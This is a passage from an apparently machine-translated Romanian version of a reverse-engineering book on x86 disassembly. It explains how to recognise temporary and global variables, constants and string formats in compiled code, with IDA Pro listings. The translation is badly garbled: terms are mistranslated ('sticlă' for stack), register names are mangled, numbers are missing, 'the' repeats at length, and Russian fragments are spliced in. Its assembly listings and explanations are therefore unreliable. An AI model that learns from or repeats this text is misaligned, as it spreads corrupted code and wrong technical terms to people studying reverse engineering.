cel mai adesea aruncate în partea de sus a stivei de comanda push și sunt scoase de acolo decomanda ROR După ce s -a întâlnit în textul programului, o combinație de instrucțiuni de împingere împerecheate cu ROR-ul corespunzător, care păstrează conținutul registrului inițializat, dar nu și un argument de sticlă al funcției*;Putemspune cu încredere că avem de -a face cu o variabilă temporară întreagă Alocarea memoriei pentru variabilele materialeși inițializarea acestora în majoritatea cazurilor apar separat Motivul este că echipele care vă permit să transferaținumere din partea de sus a fripturii coprocesorului în partea de sus a stivei procesorului principal, iar aceastăoperație trebuie efectuată manual În primul rând, registrul de top al stivei este „ridicat” (de obicei folosind comandasub esp, xxx), apoi valoarea materială este înregistrată în celulele de memorie selectate (de obicei FSTP [ESP]) Când nueste necesară o variabilă temporară, aceasta este eliminată din stivă de ADD ESP, XXX sau similară cu aceasta (sub, esp,xxx) Compilatorii avansați (de exemplu, Microsoft Visual C-T+) sunt capabili să aibă variabile temporare în argumentelerămase în partea de sus a stivei după sfârșitul ultimei funcții cauzate Desigur, acest truc se aplică exclusiv CDECL,dar nu funcției STDCALL, deoarece acesta din urmă își curăță independent argumentele de la Stack Am întâlnit deja oastfel de tehnică în studiul mecanismului de returnare a valorilor funcției din capitolul , „Identificarea valoriireturnate de funcție ” Variabile temporare de peste opt octeți (linii, tablouri, structuri, obiecte) sunt aproapeîntotdeauna plasate în stivă, evidențiază în mod distinct, printre alte tipuri, mecanismul de inițializare este în locde MOO -urile tradiționale, una dintre comenzile de redirecționare ciclice MOVSX este utilizată aici, dacă este necesar,precedată de prefixul de repetare al REP (Microsoft Visual Visual Visual C ++, Borland C ++) sau mai multe comenziMOVSX Următoarea după alta (watcom c) Mecanismul alocării memoriei Pentru variabilele temporare, este practic identiccu mecanismul alocării memoriei printr -o variabilă locală de sticlă, dar Nu apar probleme de identificare În primulrând, eliberarea memoriei cu o variabilă de sticlă are loc imediat după informații mai detaliate despre aceastăproblemă poate fi găsită în capitolul , „Identificarea argumentelor funcției„ mai multe ”informații mai detaliatedespre acest lucruProblema poate fi găsită în capitolul , „Identificarea argumentelor funcției” ParteaIII Identificarea structurilor cheie ale nivelurilor ridicate ale deschiderii cadrului stivei și a variabilelortemporare - în orice punct al funcției În al doilea rând, variabilele temporare nu sunt abordate prin registrul cadruluistivei, ci prin pointerul vârfului stivei Principalele mecanisme de manipulare a variabilelor temporare sunt pe scurtgeneralizate în tabel Tabelul Principalele mecanisme de manipulare a variabilelor temporare Metode actice a -a a -a memorie de rezervă sub esp, xxx Utilizați argumente de sticlă Scutirea memoriei Adăugare ESP, XXXînregistrare variabilă Push Mov [ESP +XXX], MOVS citind o variabilă variabilă [ESP +XXX] Transmisie a funcției cauzateîn ce cazuri sunt create variabilele temporare de compilator?De fapt, depinde de „dispoziția” compilatorului în sine Cutoate acestea, cel puțin două cazuri pot fi distinse atunci când pur și simplu nu puteți face fără a crea variabiletemporare: În operațiunile de atribuire, adăugare, înmulțire În cazurile în care argumentul funcției sau amembrului expresiei este o altă funcție Luați în considerare ambele cazuri mai detaliat Crearea de variabile temporareîn timpul transmiterii și calculului datelor, după cum am menționat anterior, microprocesoarele din seria x nuacceptă trimiterea directă a datelor din memorie în memorie, prin urmare, atribuirea unei valori variabile a altuianecesită introducerea unei variabile de registru temporar ( cu condiția ca restul variabilelor să nu fieînregistrate) Calculul expresiilor (în special cele complexe) necesită, de asemenea, variabile temporare pentru stocarearezultatelor intermediare De exemplu, câte variabile temporare sunt necesare pentru a calcula următoarea expresie (lista )?int a = xl;int s = x ;int s = / (( a) / ( -));Să începem cu parantezele, rescrierea lor după cum urmează: inttmp d = ,- tmp d = tmp d-a;Și int tmp e = l;Tmp e = tmp e-b;Apoi: int tmp t = tmp d!Tmp e;Și în sfârșit, tmp j = l;C =tmp j / tmp f În total, avem patru variabile temporare Există prea multe?Să încercăm să înregistrăm acest lucru maiscurt (prospectul ) : Listarea Minimizarea numărului de variabile temporare int tmp d = ; tmp d = tmp d-a;int tmp e = l;Tmp e = tmp e-b;Tmp d = tmp d/tmp e;tmp e = l;Tmp e = tmp e/tmp d;Doar înCDECL!GPAVA Identificarea registrului și a variabilelor temporare de doar două variabile temporare pot fi dispensate - este o chestiune complet diferită!Dar dacă expresia ar fi ceva maicomplicată?Spuneți, ar fi zece perechi de paranteze în loc de trei - câte variabile temporare ar fi necesare atunci?Nu,nu fi sedus de ispita de a privi imediat înapoi ca răspuns - încercați să -l numărați singur!Deja numărat?Ceea cetrebuie să fie luat în considerare - indiferent de o expresie dificilă - doar două variabile temporare sunt suficientepentru calculul său Și dacă deschideți parantezele, atunci vă puteți limita la unul, cu toate acestea, acest lucru vanecesita calcule excesive Vom lua în considerare această problemă în toate detaliile din capitolul , „Identificareaoperatorilor matematici”, iar acum vom vedea ce a generat compilatorul pentru cod (lista ) ;Listarea Codulgenerat de compilator pentru un exemplu dat în lista 'MOV [EBP+VAR ], MOV [EBP+VAR ], MOV [EBP+VAR C], ;Inițializarea variabilelor locale Mov eax, ;Iată prima variabilă temporară ;Valoarea directă este înregistrată în ea,deoarece Sub Team ,;Datorită caracteristicilor arhitecturale ale microprocesoarelor din seria x ,întotdeauna;înregistrează rezultatul calculului la locul redus și, prin urmare,;Redusul nu poate fi o valoare directă,deci trebuie să fie;Introduceți o variabilă temporară Sub eax, [ebp+var ];Teax: = - var ;În registrul EAX, valoareacalculată este acum stocată ( -A) Mov ech, ;O altă variabilă temporară este introdusă, deoarece EAX nu poate fi atins-;El este ocupat Sub ech, [ebp+var ];Tecx: = var ;În registrul ECH, valoarea calculată este acum stocată( -) CDQ;Transformăm un cuvânt dublu care se află în EAX într -un al patrulea cuvânt ,;plasat în EDX: EAX;(Echipa demașini IDIV se așteaptă întotdeauna să vadă divizibil în aceste registre) Idiv ech;Împărțiți ( -A) prin ( -y), plasândprivat în TEAX ;Valoarea anterioară a variabilei temporare în acest caz este inevitabilă;Cu toate acestea, pentrucalcule suplimentare nu este necesar ;Deci, lăsați -vă să fiți copleșiți - nu contează mov esh, eah;Copiați valoarea(ia) / ( -) în registrul ESC ;De fapt, aceasta este o nouă variabilă temporară T ECX, dar în același lucru;Înregistrați-vă (conținutul vechi de care nu mai avem nevoie) ;Indicele „ ” după prefixul „T” este dat ziua pentru a arăta căd esh;- deloc la fel ca TECX, deși ambele aceste variabile temporare;Stocat într -un singur registru Partea a III-a Identificarea structurilor cheie ale limbilor de nivel ridicat MOV EAX, ;Adăugăm valoare directă în EAX ;Aceastaeste o altă variabilă temporară - D EAH CDQ;Număr edx Idiv ech;Împărțiți la (( -a) / ( -y)) ;Privat este plasat înEAX MOV [EBP+VAR ], EAH;C: = / (( -a) / ( -с));Deci, pentru a calcula această expresie a necesitat patrutemporare;Variabile și doar două registre generale Crearea de variabile temporare pentru a păstra valoarea, subliniatăde funcție și rezultatele calculării expresiilor, cele mai multe limbi de nivel ridicat (inclusiv c/s+i) permitsubstituirea funcțiilor și expresiilor ca argumente directe De exemplu: myfunk (a+b, myfunc (c)) Înainte de a apelaMyFunk, compilatorul trebuie să calculeze valoarea expresiei A+B Acest lucru este ușor, dar se pune întrebarea - unde sănotezi rezultatul adăugării?Să vedem cum va face față compilatorul cu aceasta (lista ) Listarea Crearea devariabile temporare pentru stocarea rezultatelor și valorilor intermediare, revenind la funcțiile MOV EAX,[EBP+VAR C];Variabila temporară TEAX este creată, iar valoarea este copiată în ea;Variabilă locală ѵAG S PUSHEAH;Variabila temporară TEAX este păstrată în stivă, transmitând funcțiile MyFunk;Ca argument, valoarea variabileilocale ѵag s ;Deși în principiu variabila locală ar putea fi;Funcțiile sunt transmise direct - push [ebp+var ];Și nusunt necesare variabile temporare Apelați myfunk add esp, ;Funcția MyFunk își returnează valoarea în registrulEAX ;Poate fi considerat ca un fel de altă variabilă temporară PUSH EAH;Transmitem funcțiile rezultatului MyFunk returnat de funcția MyFunk Mov ech, [ebp+var j;Copiați în ECH Valoarea variabilei locale ѵAG ;ESH este o altăvariabilă temporară ;Adevărat, nu este în întregime clar de ce compilatorul nu a folosit registrul EAX;La urma urmei,variabila temporară anterioară a părăsit câmpul de vizibilitate și ,;Prin urmare, registrul EAH pe care l -a ocupat Adăugați ech, [EBP+VAR ] GPAV Identificarea registrului și a variabilelor temporare ;Ech:-ѵag + oag push eh;Trimiteți funcțiile myfunk suma a două locale locale variabile Apelați jnyfunc Zona de vizibilitate a variabilelor temporare ale variabilelor temporare este, într -unfel, variabile foarte locale Zona vizibilității lor în majoritatea cazurilor este limitată de mai multe linii de cod, înafara contextului căruia variabila temporară nu are niciun sens În general, variabila temporară nu are sens deloc șidoar înghesuirea codului De fapt, myfunk (a+b) este mult mai scurt și mai inteligibil decât int tpp = a+b;Myfunk(TMP) Prin urmare, pentru a nu înfunda listarea DizAssemblery, te străduiești să nu folosești variabile temporare încomentarii, înlocuind în schimb valorile lor reale Este rezonabil să precedem variabilele temporare printr -un prefixcaracteristic (de exemplu, așa cum se face în lista ) Listarea Un exemplu de utilizare a variabilelortemporare în comentariile lui Moch EAX, [EBP+VAR ;// var : = var ;L Teax: = var Adăugați eax, [ebp+var ] ,;l TEAX+- VAR PUSH EAX;// MyFunk (Var +Var ) Sunați MyFunt Capitolul Identificarea variabilelor globale, umplute cuvariabile globale, este cu greu cel mai groaznic blestem al hackerilor În loc să formați un arbore cu o ierarhiestrictă, componentele programului sunt strâns legate de un prieten și pentru a înțelege algoritmul unuia dintre ei,trebuie să „piepteni” întreaga listă în căutarea referințelor încrucișate Și nu un singur Dizassembler nu este capabilsă restabilească perfect legăturile încrucișate - chiar și IDA RGO!Este foarte simplu să identificăm variabile globale,mult mai ușor decât toate celelalte limbi de nivel ridicat Variabilele globale își dau imediat adresarea directă amemoriei, adică apelul la acestea arată aproximativ așa: Moch EAH, [ ], unde x este adresa variabileiglobale Este mai dificil să înțelegem de ce este necesară această variabilă și care este conținutul acesteia în acestmoment Spre deosebire de variabilele locale, variabilele globale de dependență contextuală De fapt, fiecare variabilălocală este inițializată prin funcția „ei” și nu depinde de funcțiile cauzate de ea Dimpotrivă, variabilele globale potmodifica pe oricine și aceeași, deoarece valoarea variabilei globale la punctul arbitrar al programului nu estedeterminată Pentru a afla, este necesar să analizăm toate funcțiile care o manipulează Mai mult decât atât, va finecesar să se restabilească și ordinea apelului lor Deci, vom face față tehnicii de restaurare a legăturilorîncrucișate Tehnica de restaurare, în cele mai multe cazuri, cu restaurarea referințelor încrucișate este perfectcompusă cu analizatorul automat IDA IDA și este aproape niciodată necesar să faceți acest lucru „manual” Cu toateacestea, se întâmplă ca IDA -ul RGO să greșească și nu întotdeauna (și nu toată lumea!) Acest Dizassembler este laîndemână Prin urmare, va fi foarte util să învățați cum să faceți față independent identificării variabilelorglobale Urmărirea apelurilor la căutarea contextuală variabilă globală a deplasării acestora în segmentul de cod [date]Adresarea directă a variabilelor globale facilitează extrem de mult căutarea comenzilor de mașină care lemanipulează Luați în considerare, de exemplu, următorul design: Mosh EAX, [ x v ] După asamblare, va arăta astfel: AI B Deplasarea variabilei globale este înregistrată „așa cum este” (în mod natural, în conformitate cu ordineadin spate a octetului - bătrânii sunt localizați la o adresă mai mare, iar Cele mai tinere sunt mai mici) Căutareacontextuală banală va identifica toate apelurile la variabila globală care vă interesează, doar aflați deplasareaacesteia și rescrieți -o în ordinea de bypass invers În același timp, împreună cu informații utile, veți primi o anumităcantitate de gunoi Într -adevăr, nu orice număr care coincide cu valoarea deplasării variabilei globale, GPAVA Identificarea variabilelor globale trebuie să fie un indicator la aceastăvariabilă De exemplu, secvența tocmai menționată de B satisface, de exemplu, următorul context (lista ) Pusssinging Un exemplu care ilustrează primirea gunoiului cu un contextual banal - găsirea apelurilor lavariabila globală ES Sub ESP, B MOV ECH, Eroarea este evidentă - valoarea dorită nu esteoperandul instrucțiunii, în plus, „capturat” Două instrucțiuni simultan!Aruncând toate intrările care traverseazălimitele instrucțiunilor, scăpăm imediat de o parte semnificativă a „gunoiului” Singura problemă este cum să determinămlimitele instrucțiunilor - nimic nu se poate spune în termeni de instrucțiuni despre instrucțiunile în sine De exemplu,se găsește următoarea combinație: d VE OO Această secvență, minus ultimul zero, poate fiinterpretată după cum urmează: Lea EAH, [ESH+ x v ] Cu toate acestea, dacă presupunem Că x d aparține „cozii” comenzii anterioare, se va dovedi următoarele: Adăugați d, [esh] [edi] * Deasemenea, este posibilă o situație în care mai multe echipe sunt în general cea mai fiabilă modalitate de adetermina limitele comenzilor mașinii este Dizassembing -ul următor Din păcate, aceasta este o operațiune extrem deresursă și nu fiecare Dizassembler știe să urmărească codul Prin urmare, trebuie să mergeți în alt mod figuratvorbind, codul mașinii poate fi înfățișat sub forma unui text scris tipărit fără spații Dacă încercați să citiți dintr-o poziție arbitrară, cel mai probabil vom cădea în mijlocul cuvântului și nu vom înțelege nimic Poate, prin voiașansei, primele câteva silabe vor fi formate într -un cuvânt semnificativ (sau chiar două!), Dar vor exista o prostiecontinuă De exemplu: Mamyla-Rama Da, mamă - mai multe număr de la mama, este potrivit?Se potrivește Atunci Larama Laramaeste cine?Un erou indian popular cu mulți părinți?Sau mame la Rama?Și cum îți place mama lui La Ra Mu - în sensul a treimame din La, RA și MU?Există unele prostii înaintăm o scrisoare înainte, lăsând m cuvântul precedent și, bine, esteposibil, aceasta este uniunea, mai ales că urmărim pronumele semnificativ, se dovedește și suntem Larames sau un SuntemLara Mu Până la urmă, cine este acest Larama?!Ne deplasăm un alt mod și citim săpunuri, iar în spatele acestuia este uncadru "A câștigat! Cine este spălarea cadrelor? De regulă, aceasta este o mamă! Aici, ceva de genul acesta este citit,iar această analogie este foarte completă Aici, de exemplu, în cuvântul nu poate începe cu unele litere (de exemplu, cu„S”, semn moale și solid), există sufixe și terminații caracteristice, cu o combinație de litere care practic nu apar înalte părți ale propoziție În consecință, văzând la sfârșit că există mai multe într -un rând de zerouri de mers, esteposibil să spunem cu un grad ridicat de încredere că acestea au semnificație directă, iar valorile directe suntlocalizate la sfârșitul echipei Diferențe între constante de la semne, astfel, continuăm să creștem gunoiul maideparte Aici, în sfârșit, am scăpat de lucrări false, a căror sensul este evident la prima vedere O grămadă de gunoi afost vizibil diminuată, dar Astfel de mici lucruri precum Push x continuă să se întâlnească în ea Ce este x - constant sau deplasare? Cu un succes egal poate fi egalsă fie ambele Până să ajungem la codul care sămanipuleze cu acesta, nu vom putea spune nimic inteligibil Dacă codul de manipulare se adresează x după valoare,acesta este o constantă, iar dacă prin referință, acesta este un pointer (în acest context al deplasării) Vom discuta încontinuare această problemă în capitolul , „Identificarea constantelor și deplasărilor”, până în prezent vom observacu mare ușurare că adresa minimă de descărcare a fișierelor în Windows X este x și nu există atât de multeconstante exprimate de un astfel de mare număr Partea a III -a Identificarea structurilor cheie ale limbilor denivel înalt, rețineți că adresa minimă de descărcare din sistemele familiale Windows NT este x , cu toate acestea,astfel încât programul să funcționeze cu succes sub Windows NT, iar sub Windows X, ar trebui să fie încărcat cel puțin x Coșmarurile din modul pe biți într-un mod pe biți pentru a distinge constanta de pointer nu este la felde simplu ca în modul pe de biți!Într-un mod de biți, subiecților li se atribuie unul (sau mai multe) segmente îndimensiunea octetului ouoid, iar valorile admise ale deplasărilor sunt închise într-un interval restrâns [ x , oxfff],iar majoritatea variabilelor sunt foarte mici și vizual indistinguibil de constante O altă problemă - un segment cel maiadesea nu conține toate datele și trebuie să porniți altul (sau chiar mai mult) Două segmente nu sunt încă: unul esteabordat prin registrul DS, celălalt prin ES și nu există dificultăți în determinarea ce tip de segment se referă laacest indicator De exemplu, dacă ne interesează toate apelurile la variabila globală X, situată în principal desegmentul de schimbare OKHBBB, atunci comanda Moos Ax, ES: [OKBBB] îl vom arunca imediat în coșul de gunoi, deoarecesegmentul principal este adresat prin DS (implicit) și aici - es Adevărat, apelul poate apărea în două etape, deexemplu: Mosh VX, xBBB/XXX - XXX/MOOS, ES: [BX] În acest caz, când o vezi pe Mom, OHBBB, nu numai că nu putem determinasegmentul, dar chiar spunem sigur, dar este deloc o deplasare?Cu toate acestea, acest lucru nu complică foarte multanaliza mai rău, dacă datele din program din program sunt de zece bune (și ce, poate dura aproximativ kb dememorie statică?) Niciun registre de segment nu va fi suficient pentru acest lucru, iar reasignarea lor va avea loc înmod repetat Apoi, pentru a afla ce tip de segment are loc apelul, va fi necesar să se stabilească valoarea registruluide segment Cum să -l determini?Cel mai simplu lucru este să parcurgeți un pic de ecranul Dizassembler, căutândinițializarea acestui segment de înregistrare cu ochii și amintindu -vă Faptul că poate fi realizat nu numai de echipa din Moscova Segreg, Reg, dar destul de des rora!De exemplu, push es/popds este echivalent cu Moch DS, ES - True, Comenzile Moscovei Segreg, Segreg în „limbajul” microprocesorilor x , vai,nr Deoarece nu există echipe Moos Segreg, costuri, pe care trebuie să le imitați manual sau așa: MoOH AH, OHBBB/MOOS Ah,sau cam așa: Push x /Ror es Este bine că regimul de biți a trecut aproape complet în trecut, luând toateproblemele sale în nisipul istoriei Nu numai programatori, ci și hackeri cu o tranziție la un regim de de biți suspincu ușurare Adresarea indirectă a variabilelor globale destul de des trebuie să audă afirmația potrivit căreiavariabilele globale sunt întotdeauna abordate direct (excluzând, desigur, inserții de asamblare - pe asamblator,programatorul poate apela la variabile așa cum dorește) De fapt, totul este departe de caz dacă variabila globalăeste transmisă funcțiilor prin legătură (de ce nu programatorul nu transferă variabila globală prin legătură?), Atunciacesta va fi abordat indirect - prin pointer Puteți obiecta acest lucru - de ce, deloc, este transmis clar funcțieivariabile globale?Orice funcție și fără aceasta se poate apela la ea Da, chiar poate, dar numai dacă funcția știe despreaceasta în avans Aici, să zicem, avem o funcție XCHG care își schimbă argumentele în locuri și există două variabileglobale care au fost impresionante de schimbat Funcțiile XCHG sunt disponibile toate variabilele globale, dar nu „știe”care dintre ele trebuie schimbate (și este necesar deloc?) Deci trebuie să transmită clar variabilele globale caargumente Și acest lucru înseamnă că nu vom găsi toate apelurile la căutarea contextuală variabilă globală Cel mai tristlucru este să nu le găsești și IDA Pro (acest lucru ar necesita un emulator de procesoare cu mărturisire completă saucel puțin principalele sale comenzi) Ilustrăm ceea ce s -a spus de exemplul dat în lista GPAVA Identificareavariabilelor globale Listarea O transmisie clară a variabilelor globale #include int a;int b;//Variabilele globale A și B // Funcționare care schimbă valorile argumentelor xchg (int *a, int *b) int s;C =*a;*B =*a;*B= s;// aaaaaaa^aaaaaaaaa un apel indirect la Arugrances // prin pointer // Dacă argumentele funcției sunt variabileglobale, atunci acestea vor fi // abordate nu direct, ci indirect a = x ;B = x ;// Aici - apel direct // lavariabile globale Xchg (& a, & b);// Transferul unei variabile globale prin legătură Rezultatul compilării acestuiexemplu folosind compilatorul Microsoft Visual C ++ ar trebui să arate așa cum se arată în lista Listarea Rezultatul compilării exemplului în listarea folosind compilatorul: Microsoft Vistual C ++ Main Procapropiat;C DE XREF: START+AF^P PUSHH EBP MOV EBP, ESP;Deschide rama Stack MOV DWORD , H;Inițializați variabilaglobală DWORD ;Faptul că aceasta este într -adevăr o variabilă globală indică;Adresare directă MOV DWORD C, H;Inițializați variabila globală DWORD C Push ofset DWORD C;See Transmite funcțiile deplasării variabileiglobale;DWORD C ca argument (adică cu alte cuvinte, îl transmitem prin legătură) Aceasta înseamnă că funcțiacapturată va contacta;variabila indirect, prin pointer - exact modul în care se transformă;Cu variabile locale Pushofset dword ;Transmitem funcțiile deplasării variabilei globale DWORD Sunați la XCHG ParteaIII Identificarea structurilor cheie ale limbilor de nivel înalt adaugă esp, pop ebp retn mai n endp xchg proc înapropiere;Cod xref: main+ viteză var = dword ptr - arg = dword ptr arg = dword ptr och push ebp ebp ebp,esp;Deschide rama Stack Împinge ECX;Subliniem memoria pentru variabila locală ѵAG MOV EAX, [EBP+arg ];Încărcămconținutul argumentului argument ah Mov ech, [eah];Uite!Apel indirect la variabila globală*;De asemenea, ei spun - ca șicum nu există astfel de oameni ”;Desigur, determinați că apelul are loc precis;Variabila globală (și ce fel de variabilăglobală) este posibilă;Analizând doar codul funcției defiant mov [ebp+ѵag - ], esh;Copiați valoarea *arg în variabilalocală ѵag Mov edx, [ebp+arg ];Încărcăm conținutul argumentului arg în EDX MOV EAX, [EBP+arg ];Încărcăm conținutulargumentului arg în EAC Mov ech, [eah];Copiați în valoarea ECH a argumentului *arg mov [edx], esh;Copiați în [arg ]valoarea AGD [ ] Mov edx, [ebp+arg ];Încărcăm valoarea AGD în EDX MOV EAX, [EBP+VAR ];Încărcăm valoarea variabileilocale în EAX ѵAG (magazine *AGD ) mov [edx], eah;Încărcăm în *AGD VALOARE *AGD Mov ESP, EBP POP EBP Retn GPAV Identificarea variabilelor globale XCHG ENDP DWORD DD DESPRE DWORD C DD O;Date Xref: Main+ îw Main+LCîo Date Xref: Main+Dorn Main+ Viteză la ambelevariabile globale Primele două: Main+ W și Main+DW la Codul de inițializare ('W' - din „WRITE” - T - t - t, în contactcu o înregistrare) A doua două: Main+LCO și Main+ o ('O' - din „Offset” - adică obținerea unei deplasări a uneivariabile globale) dacă există legături cu sufixul o, printre referințele încrucișate la variabila globală, proiectareacaptării deplasării (un analog al compensării directivei de asamblare), atunci ar trebui să fiți imediat atenți La urmaurmei, din moment ce avem de -a face cu Offset, înseamnă că există o transmitere a unei variabile globale prinlegătura Iar legătura este o adresă indirectă Iar adresarea indirectă este o analiză manuală obositoare și nu existăminuni ale progresului Variabile statice variabile statice sunt un tip de variabile globale, dar cu o zonă limitată devizibilitate - sunt disponibile doar din funcția în care au fost declarate În toate celelalte aspecte, variabilelestatice și globale sunt complet coincid - sunt plasate în segmentul de date, abordate direct (excluzând cazurile decirculație prin legătura), etc Există o singură diferență semnificativă - orice funcție poate fi adresată globaluluivariabilă și doar unul se poate apela la static - doar unul Ce zici de variabilele globale utilizate de o singurăfuncții?Care sunt aceste variabile globale?!Acest lucru nu este global, ci este curbura codului sursă alprogramului Dacă variabila este folosită doar de o singură funcție, nu este nevoie să o declarați globală!Orice celulăde memorie adresată direct este o variabilă globală (statică) (cu unele excepții), dar nu toată variabila globală(globală) este întotdeauna abordată direct Capitolul Identificarea constantelor și deplasărilor microprocesoarelordin seria x operanduri de trei tipuri: înregistrare, valoare directă, indicator direct Tipul de operand este clarsetat într -un câmp special de instrucțiuni ale mașinii numite MOD, astfel încât să nu apară probleme în identificareatipurilor de operanți (Fig ) În ceea ce privește registrele, știm cu toții cum arată registrele Pointerul acorduluigeneral acceptat este încheiat în parantezele de colț, iar valoarea directă este înregistrată fără ele Un exemplu estedat în lista Mosh, eah;Mosh, x ;Mow [ x ], eah; : \ part \ ch \ suplementar Chris Kaspersky "Imaginea gândirii este IDADisAssembler: Solon-R Capitolul Identificarea literalelor și a liniilor, s-ar părea că ar putea fi dificil deidentificat rânduri? Dacă ceea ce se referă indicatorul, arată ca o linie, pare o linie, se pare că o linie -aceastaeste linia! Mai mult, în marea majoritate a cazurilor, liniile sunt detectate și identificate prin vizionarea banală aThe the the the the the the the the the the the the the the the the the the the the the the the the the the the the thethe the the the the the the the the the the Dump -ul programului (cu condiția, desigur, că acestea nu sunt criptate, darcriptarea este subiectul unei conversații separate) Asta este, dar nu totul este atât de mult! Sarcina este „numărulunu” - identificarea automată a lui Liniile din program - până la urmă, nu derulați prin mai multe depozite de megabytemanual? Există mulți algoritmi pentru identificarea liniilor Fiabil) pe baza următoarelor două teze: Linia constădintr -o gamă limitată de caractere Într -o aproximare aproximativă, acestea sunt numere, caractere alfabetice (inclusivprobleme), semne de punctuație și simboluri oficiale precum tabelarea sau întoarcerea unei trăsuri Șirul ar trebui săfie format din cel puțin mai multe caractere pentru a lua în considerare linia minimă a liniei egale cu octeții, apoipentru a detecta automat toate liniile, este suficient să găsești toate secvențele de la n sau mai multe caractere„șir” Principala dificultate este de a determina valoarea lui N și de a lua o decizie cu privire la care simboluri artrebui considerate „șir” Dacă valoarea n nu este suficientă, aproximativ trei sau patru octeți, atunci vom primi unnumăr foarte mare de lucrări false Dimpotrivă, când N este mare, aproximativ șase până la opt octeți, număruldeclanșatorilor falși este aproape de zero și pot fi neglijați Cu toate acestea, în același timp, toate liniile scurte,cum ar fi OK, da, nu vor rămâne nerecunoscute!O altă problemă este că, pe lângă simbolurile alfabetice-digitale dinlinii, există elemente ale pseudografiei (în special frecvente, sunt în aplicații de consolă) și tot felul de „mușchi”,„săgeți”, „arahide”-într-un cuvânt, Aproape întreaga masă ASCII Cum diferă atunci linia de o secvență de octețialeatori?Analiza frecvenței este neputincioasă-necesită cel puțin o sută de octeți din text pentru funcționare normalăși vorbim despre linii de două sau trei caractere!Să mergem de la celălalt final-dacă programul are o linie, atuncicineva se referă la ea Și dacă da - puteți căuta un semn la linia recunoscută printre valorile directe Dacă se găsește,șansele ca aceasta să fie într -adevăr o linie și nu o secvență aleatorie de octeți, să crească brusc Este simplu, nu -iașa?Pur și simplu, dar nu chiar!Luați în considerare un exemplu dat în lista Mai detaliat, acest lucru a fostdescris în capitolul , „Identificarea constantelor și deplasărilor” Partea a III -a Identificarea structurilorcheie ale limbilor de nivel înalt Cel mai simplu program de pe Pascal, care ilustrează recunoașterea liniilorBegin Writeln ( „Bună ziua, Sailor ”); End Compilatorul său Pascal corespunzător (de exemplu, Delphi sau Pascal Free)și, prin încărcarea fișierului compilat pe Dizassembler, hai să mergem pe segmentul de date Un fragment care pareaproximativ așa cum se arată în lista Conținutul segmentului de date din listarea datelor din Exemplu subctrat dela prospectul L Data: UNK data: data: data: data; data: data: data: data: data: data: A data: B data: C data : D Data: E Data: F Data: Word DB DB DB DB DB DB DB DB DW OEH H H CH CH H H H H H FH H H SEE!(Faptul căaceasta este o linie - nu avem nicio îndoială) Să încercăm să găsim: Cine se referă la ea?În IDA RGO, pentru aceasta, artrebui să apăsați combinația de tastatură + , iar în câmpul de căutare pentru a introduce prejudecata liniei -valoarea x Și aici ne așteaptă o surpriză neplăcută Căutarea se încheie în eșec, după cum se dovedește căcăutarea mesajului a eșuat Și atunci ce este transmis de funcția Writeln?Poate că acesta este un glitch al Ida RGO?Neuităm manual prin textul DizAssemble - iar rezultatul va fi din nou zero Motivul eșecului nostru este că la începutulșirului Pascal există un octet care conține lungimea acestei linii Într -adevăr, în groapa prin deplasarea x există valoarea OCHA (paisprezece în sistemul de calcul zecimal) Și câte personaje sunt Hello, Sailor ?Ne gândim: unul,doi, trei paisprezece!Apăsați din nou combinația de tastatură + Și căutăm un operand direct egal cu x Și, de fapt, de data aceasta căutarea va avea succes (listarea ) ;Listarea Результат поисканепосредственного операнда, равного смещению начала строки text: push text: push text: Bpush text: D call text: push text: call h [ebp+var ] FPC WRITE TEXT SHORTSTR [ebp+var ] FPC WRITELN END Гпава Идентификация литералов и строк text: А text: F text: text: text: A push offset loc A call FPC IOCHECK call FPC DO EXIT leave retn Отказывается, малоидентифицировать строку— еще, как минимум , Este necesar să se stabilească limitele sale Tipurile de linii sunt cele maipopulare în rândul următoarelor tipuri de linii: C-glamuri care se termină cu zero, DOS-String, care se termină cu unsimbol al $, șir Pascal, precedat de unu, două sau patru - de, linii care conțin lungimea liniei (Fig ) Luațiîn considerare fiecare dintre aceste tipuri mai detaliat Simbolul sfârșitului liniei | n |, | s | a | l | o | r |!| $ DOS-STROKES BYTE /LINIA LINIE | I | H | E | L | L | Despre |, | S | A | l | O | Ri!Pascal Strokes „ Bytes JLungimea liniei | QJH | E | L | L | O |, | S | A | L | O | R | I Delphi-String, Bytes Lungime Lengy I H | E| l | l | o |, | ș | a | с | l | o | r | i șirul pascal larg fig Principalele tipuri de linii de șir C de coardă C,numite și ASCIIZ-STRACKS , sunt un tip de linie foarte obișnuit, care este utilizat pe scară largă în familiile Windowsși UNIX Simbolul \ (care nu trebuie confundat cu ) are un scop special și este interpretat într-un mod special-ca unfinisaj șir Lungimea șirului asciiz este aproape limitată de nimic altceva decât lungimea segmentului sau dimensiuneaspațiului de adrese alocat de proces În consecință, în Windows X și sistemele din familia Windows NT, dimensiuneamaximă a liniei ASCIiz este de doar puțin mai puțin de GB și aproximativ kb în Windows și MS-DOS Lungimea realăa șirului asciiz este doar pe octet mai mare decât șirul ASCII inițial În ciuda tuturor avantajelor enumerate mai sus,unele dezavantaje sunt, de asemenea, inerente șirurilor S În primul rând, coada asciiz nu poate conține zero octeți Prinurmare, nu este potrivit pentru procesarea datelor binare În al doilea rând, copierea operațiunilor, ASCII cu zero-terminată (ASCIIZ) -ASCII-ARKE, completată de zero Partea III Identificarea structurilor cheie cuniveluri ridicate de comparație și concatenare a șirului C sunt asociate cu costuri generale semnificative Cert este căeste neprofitabil ca procesoarele moderne să lucreze cu octeți individuali - este recomandabil ca aceștia să se ocupe decuvinte duble Dar, din păcate, lungimea șirului asciiz nu este cunoscută în avans și trebuie calculată „în zbor”,verificând dacă byte-ul este un simbol al finalizării Adevărat, dezvoltatorii unor compilatori merg la truc -completează linia nu un zero, ci șapte zerouri - ceea ce vă permite să lucrați cu cuvinte duble, iar acesta este unordin de mărime mai rapid De ce o familie, nu patru?La urma urmei, există patru octeți într -un cuvânt dublu!Da, esteadevărat, patru, dar gândiți -vă la ce se va întâmpla dacă ultimul simbol semnificativ al liniei va trebui să fie peprimul octet al unui cuvânt dublu?Este adevărat că trei octeți zero vor fi completați cu sfârșitul său, dar un cuvântdublu, datorită intervenției primului simbol, nu va mai fi zero!De aceea, următorul dublu cuvânt trebuie să fie furnizatde încă patru zero octeți, atunci va fi garantat să fie zero Cu toate acestea, șapte octeți oficiali pentru fiecarelinie sunt deja prea mari!DOS Stripes în MS-DOS Funcția liniei de linie percepe semnul $ ca simbol al finalizării, deciîn cercurile programatice astfel de linii Ei numesc „DOS-STRINGS” Termenul nu este în întregime corectă, toate alte funcții MS-DOS funcționează exclusiv cu strotsAscilz!Motivul pentru o alegere atât de ciudată a unui 